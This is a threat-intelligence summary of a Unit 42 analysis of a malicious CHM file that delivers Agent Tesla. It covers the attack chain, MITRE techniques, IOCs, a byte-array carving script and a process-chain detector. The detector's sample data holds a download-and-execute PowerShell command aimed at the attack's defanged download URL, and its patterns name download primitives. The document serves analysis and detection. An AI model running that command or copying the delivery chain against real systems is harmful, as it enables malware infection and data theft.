Harmful Help: Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla

Unit 42 analyzes a multi-stage attack that begins with a malicious Compiled HTML Help (.chm) file delivered inside a 7z archive and culminates with Agent Tesla loading and exfiltrating data via FTP. The operation uses obfuscated JavaScript and PowerShell across several stages to evade defenses and highlights why non-traditional file types require vigilance. #AgentTesla #ORDER_OF_CONTRACT #pk_consult #videoalliance

Key Points

  • The initial payload is a 7zip archive named ORDER OF CONTRACT-pdf.7z containing ORDER OF CONTRACT-pdf.chm (SHA256: 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa) that, when opened, displays a decoy window and executes code.
  • The CHM file contains obfuscated JavaScript (kkjhk.htm) that, when run, reveals code via the r variable and triggers PowerShell execution.
  • Deobfuscated PowerShell uses Test-Connection to ping Google to verify connectivity before downloading and executing code from http://pk-consult[.]hr/N2.jpg.
  • The downloaded content is not a JPEG but additional PowerShell code that decompresses and loads several byte arrays in memory; these can be written to files for analysis.
  • The final payload consists of a loader DLL (SHA256: 0fd2e47d373e07488748ac63d9229fdef4fd83d51cf6da79a10628765956de7a) and a gzip-compressed Agent Tesla (SHA256: c684f1a6ec49214eba61175303bcaacb91dc0eba75abd0bd0e2407f3e65bce2a); Agent Tesla is loaded into RegAsm.exe for execution and exfiltrates via FTP to ftp.videoalliance[.]ru.
  • The attack illustrates attackers’ interest in bypassing security controls and user training by abusing Compiled HTML Help, a less common delivery vector than the usual document and script lures.
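The fourth key point notes that the downloaded stage carries its next components as byte arrays that are decompressed and loaded in memory, and that an analyst can instead write them to files. The Python below is an added example of that carving step; it is not Unit 42's code and does not reproduce the real N2.jpg content. It assumes the arrays appear as `[byte[]]$name = 0x..,0x..` literals (hex or decimal), gunzips any array that starts with the gzip magic bytes, and records a SHA256 per artifact so the results can be compared against the hashes listed in this summary. The sample script it parses is constructed inline from placeholder strings.

```python
"""Carve [byte[]] literals out of a PowerShell stage, gunzip the ones that are
gzip-compressed, and write each to disk with its SHA256 so it can be analysed
without letting the script load it in memory."""
import gzip
import hashlib
import re
from pathlib import Path

# Only the "[byte[]]$name = 0x4d,0x5a,..." literal form is handled (hex or
# decimal elements); other PowerShell spellings are an assumed out-of-scope case.
ELEMENT = r"(?:0x[0-9a-fA-F]{1,2}|\d{1,3})"
BYTE_ARRAY_RE = re.compile(
    r"\[byte\[\]\]\s*\$(?P<name>\w+)\s*=\s*"
    r"(?P<body>(?:" + ELEMENT + r"\s*,\s*)*" + ELEMENT + r")",
    re.IGNORECASE,
)
GZIP_MAGIC = b"\x1f\x8b"


def parse_elements(body: str) -> bytes:
    """Turn '0x1f, 0x8b, 8' into the bytes it denotes."""
    out = bytearray()
    for tok in re.split(r"\s*,\s*", body.strip()):
        out.append(int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10))
    return bytes(out)


def extract_byte_arrays(script: str) -> dict:
    """Map each array variable to its raw bytes, the decompressed payload
    (identical to raw when not gzip), whether it was gzip, and a SHA256."""
    found = {}
    for m in BYTE_ARRAY_RE.finditer(script):
        raw = parse_elements(m.group("body"))
        is_gzip = raw.startswith(GZIP_MAGIC)
        payload = gzip.decompress(raw) if is_gzip else raw
        found[m.group("name")] = {
            "raw": raw,
            "payload": payload,
            "gzip": is_gzip,
            "sha256": hashlib.sha256(payload).hexdigest(),
        }
    return found


def dump_artifacts(found: dict, out_dir: str) -> list:
    """Write every carved payload to out_dir/<var>_<sha256 prefix>.bin."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for name, info in found.items():
        path = out / f"{name}_{info['sha256'][:16]}.bin"
        path.write_bytes(info["payload"])
        paths.append(path)
    return paths


# Constructed stand-in for the downloaded stage; the real N2.jpg content is
# not reproduced here, and these placeholder strings are not executables.
LOADER_STANDIN = b"MZ stand-in for a .NET loader DLL"
TESLA_STANDIN = b"MZ stand-in for the gzip-compressed Agent Tesla executable"


def build_sample_script() -> str:
    def literal(data: bytes) -> str:
        return ",".join(f"0x{b:02x}" for b in data)

    return (
        f"[byte[]]$gc = {literal(LOADER_STANDIN)}\n"                # plain array
        f"[byte[]]$at = {literal(gzip.compress(TESLA_STANDIN))}\n"  # gzip array
        "$ms = New-Object IO.MemoryStream(,$at)\n"
        "# ... the real stage decompresses and loads these in memory ...\n"
    )


if __name__ == "__main__":
    arts = extract_byte_arrays(build_sample_script())
    for name, info in arts.items():
        print(f"{name}: gzip={info['gzip']} size={len(info['payload'])} sha256={info['sha256']}")
    print(dump_artifacts(arts, "./carved"))
```

Run it against a saved copy of a downloaded stage by replacing `build_sample_script()` with the file's text; each `.bin` that comes out can then be hashed and inspected in isolation rather than observed only as an in-memory load.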

MITRE Techniques

  • [T1204] User Execution – Malicious CHM file triggers execution when opened, displaying a decoy window. Quote: “When the victim opens the help file, this apparently innocuous window displays.”
  • [T1027] Obfuscated/Compressed Files and Information – The file contains obfuscated JavaScript that is executed. Quote: “The file contains obfuscated JavaScript that is executed when the file is opened.”
  • [T1140] Deobfuscate/Decode Files or Information – Deobfuscation of the PowerShell/JS to read the code; quote: “We can deobfuscate this code… by removing the final obfuscated Invoke-Expression cmdlet.”
  • [T1059.001] PowerShell – PowerShell is used to download and execute further code after initial execution. Quote: “PowerShell Test-Connection cmdlet to ping Google to verify connectivity before continuing. The sample then downloads and executes code from http://pk-consult[.]hr/N2.jpg.”
  • [T1105] Ingress Tool Transfer – Downloading and executing code from a remote server (http://pk-consult[.]hr/N2.jpg). Quote: “downloads and executes code from http://pk-consult[.]hr/N2.jpg.”
  • [T1055] Process Injection – The final Agent Tesla payload loads into the RegAsm.exe process to execute. Quote: “loader DLL loads Agent Tesla into the RegAsm.exe process to execute.”
  • [T1041] Exfiltration – Agent Tesla uses FTP to exfiltrate data to ftp.videoalliance[.]ru. Quote: “This Agent Tesla sample uses FTP and connects to ftp.videoalliance[.]ru for data exfiltration.”
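The technique list above reads as a process chain a defender can watch for: the CHM handler spawning PowerShell, PowerShell running Test-Connection before fetching a ".jpg" that is really code and handing it to Invoke-Expression, and PowerShell then spawning RegAsm.exe. The Python below is an added detection sketch, not Unit 42's tooling. It assumes process-creation events with `parent`, `image` and `cmdline` fields (Sysmon-style names chosen here), and the sample events are constructed, including the defanged URL copied from this summary.

```python
"""Flag the CHM -> PowerShell -> RegAsm.exe chain in process-creation events.
Events are constructed, Sysmon-style dictionaries, not real telemetry."""
import re


def image_name(event, key):
    """Basename of a Windows image path, lower-cased for comparison."""
    return event[key].lower().replace("/", "\\").rsplit("\\", 1)[-1]


def chm_spawns_powershell(e):
    # hh.exe is the Compiled HTML Help viewer; it should rarely launch a shell.
    return image_name(e, "parent") == "hh.exe" and image_name(e, "image") == "powershell.exe"


def ps_checks_connectivity_then_downloads(e):
    # Connectivity probe followed by a download primitive in one command line.
    c = e["cmdline"]
    return (image_name(e, "image") == "powershell.exe"
            and re.search(r"test-connection", c, re.I) is not None
            and re.search(r"downloadstring|downloaddata|downloadfile|invoke-webrequest|net\.webclient",
                          c, re.I) is not None)


def ps_executes_image_url(e):
    # An image-extension URL fed to Invoke-Expression (or its alias iex).
    c = e["cmdline"]
    return (image_name(e, "image") == "powershell.exe"
            and re.search(r"h(?:tt|xx)ps?://\S+?\.(?:jpe?g|png|gif)\b", c, re.I) is not None
            and re.search(r"invoke-expression|\biex\b", c, re.I) is not None)


def powershell_spawns_regasm(e):
    # RegAsm.exe is a legitimate .NET tool but a known host for injected payloads.
    return image_name(e, "parent") == "powershell.exe" and image_name(e, "image") == "regasm.exe"


RULES = [chm_spawns_powershell, ps_checks_connectivity_then_downloads,
         ps_executes_image_url, powershell_spawns_regasm]


def scan(events):
    """Return (event id, rule name) pairs for every rule each event trips."""
    return [(e["id"], rule.__name__) for e in events for rule in RULES if rule(e)]


# Constructed sample events: 1 and 3 mirror the chain in this summary, 2 and 4 are benign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\hh.exe", "image": PS,
     "cmdline": "powershell -w hidden -c \"Test-Connection google.com -Count 1 -Quiet; "
                "IEX (New-Object Net.WebClient).DownloadString('hxxp://pk-consult[.]hr/N2.jpg')\""},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -Command \"Test-Connection dc01 -Count 2\""},
    {"id": 3, "parent": PS, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "cmdline": "chrome.exe https://example.test/report.png"},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The parent/child rules are the cheapest to deploy and survive changes to the obfuscation, since hh.exe launching PowerShell or PowerShell launching RegAsm.exe is visible regardless of what the script says; the command-line rules add confidence when the chain matches this specific stage.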

Indicators of Compromise

  • [File Hash] 3446ec621506d87d372c596e1d384d9fd2c1637b3655d7ccadf5d9f64678681e, 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa, 9ba024231d4aed094757324d8c65c35d605a51cdc1e18ae570f1b059085c2454, 0fd2e47d373e07488748ac63d9229fdef4fd83d51cf6da79a10628765956de7a, c684f1a6ec49214eba61175303bcaacb91dc0eba75abd0bd0e2407f3e65bce2a – Hashes associated with the components (ORDER OF CONTRACT-pdf.7z, ORDER OF CONTRACT-pdf.chm, N2.jpg, loader DLL, Agent Tesla payload).
  • [File Name] ORDER OF CONTRACT-pdf.7z, ORDER OF CONTRACT-pdf.chm, N2.jpg, GC.dll, Agent Tesla dotNet executable – Filenames observed in the attack chain.
  • [URL] hxxp://pk-consult[.]hr/N2.jpg, ftp.videoalliance[.]ru – Remote download and exfiltration endpoints used by the payload.
  • [Domain] pk-consult.hr, videoalliance.ru – Domains involved in hosting/downloading components and exfiltration.

Read more: https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/